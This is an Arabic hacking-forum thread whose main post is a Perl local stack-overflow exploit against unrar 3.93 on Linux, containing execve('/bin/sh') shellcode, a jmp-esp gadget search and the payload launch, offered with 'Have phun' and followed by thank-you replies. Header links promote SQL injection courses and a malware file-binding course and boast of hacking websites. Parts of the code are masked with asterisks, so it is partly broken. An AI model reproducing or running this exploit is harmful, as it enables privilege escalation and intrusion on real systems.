1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

Unrar 3.9.3 Local Stack Overflow Exploit

الموضوع في 'قسم اللوكال رووت Local Root' بواسطة Mr.L4iVe, بتاريخ ‏18 ديسمبر 2011.

كاتب الموضوع : Mr.L4iVe المشاهدات : 2,345 الردود : 4 ‏18 ديسمبر 2011
حالة الموضوع:
مغلق
  1. غير متصل

    Mr.L4iVe
    rank
    Developer

    عضو منذ:
    ‏15 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    سلام عليكم ورحمة الله وبركاتة ..

    كود PHP:
    #!/usr/bin/perl 
    =head1  TITLE 
      
    Winrar 
    <= v3.93 Local Stack-based Overflow exploit 
      
      
    =head2 DESCRIPTION 
      
    This script triggers a buffer overflow attack against Unrar
    the linux popular version of WinRar extractor
    It was not developped to bypass non-executing stack patches
    Have phun 
      
    =head2 AUTHORS 
      
    ZadYree 
    ~~ 3LRVS Team Low Level ********s Reversing Vxing Security 
      
      
    =head2 Tested ON 
      
    Linux Debian 6. May work on FreeBSD

      
    =
    head3 THANKS 
      
    kmkz 
    regol 
    hellpast 
    Hebiko 
    m_101 
    ZadYree 
      
    SNCF 
    The one who sent me that locked 
    .rar 
    =cut 
    use 5.010
      
    # *****code: execve("/bin/sh") => http://www.*****-storm.org/*****code/files/*****code-752.php 
    use constant *****CODE =>    "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f" 
                    
    "\x73\x68\x68\x2f\x62\x69\x6e\x89" 
                    
    "\xe3\xb0\x0b\xcd\x80"
    use 
    constant BUFF => ('-' . ('3lrvs' x 820)); 
    ## 
      
      
    $p**** = "/usr/bin/unrar"
      
    die 
    "[-]File $p**** does not exist!\012" unless (-e $p****); 
      
    say "
    [*]Looking for jmp *%esp gadget..."

      
    for 
    my $line(qx{objdump -D $p**** | grep "ff e4"}) { 
        
    $esp "0" . $1last if ($line =~ m{([a-f0-9]{7}).+jmps{4}*%esp}); 

      
    say '[+]Jump to $esp found! (0x'$esp")\012[+]Now exploiting..."
    sleep(1); 
      
    my @payload = ($p****, (BUFF pack("V"hex($esp)) . *****CODE "\012")); 
      
    exec(@payload);  
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]

     


    جاري تحميل الصفحة...
  2. غير متصل

    خأإآلد
    DeveloPer Plus

    عضو منذ:
    ‏18 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: Unrar 3.9.3 Local Stack Overflow Exploit

    الله يعطيك العافيه)5:"
     


  3. غير متصل

    нάсќɇя
    rankrank
    Developer

    عضو منذ:
    ‏17 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: Unrar 3.9.3 Local Stack Overflow Exploit

    تعيش يامبدع
    )5:"
     


  4. غير متصل

    mxstar
    rank
    Developer

    عضو منذ:
    ‏4 فبراير 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: Unrar 3.9.3 Local Stack Overflow Exploit

    شكرا لك علي هذا الموضوع
     


  5. غير متصل

    τєғα сσđ
    rank
    ExpErt DeveloPer

    عضو منذ:
    ‏8 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    ĿĘåяמ ҺāĆҝĕĐ
    الإقامة:

    رد: Unrar 3.9.3 Local Stack Overflow Exploit

    الله يعطيك العافية حبيبي
    موضوع جميل
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...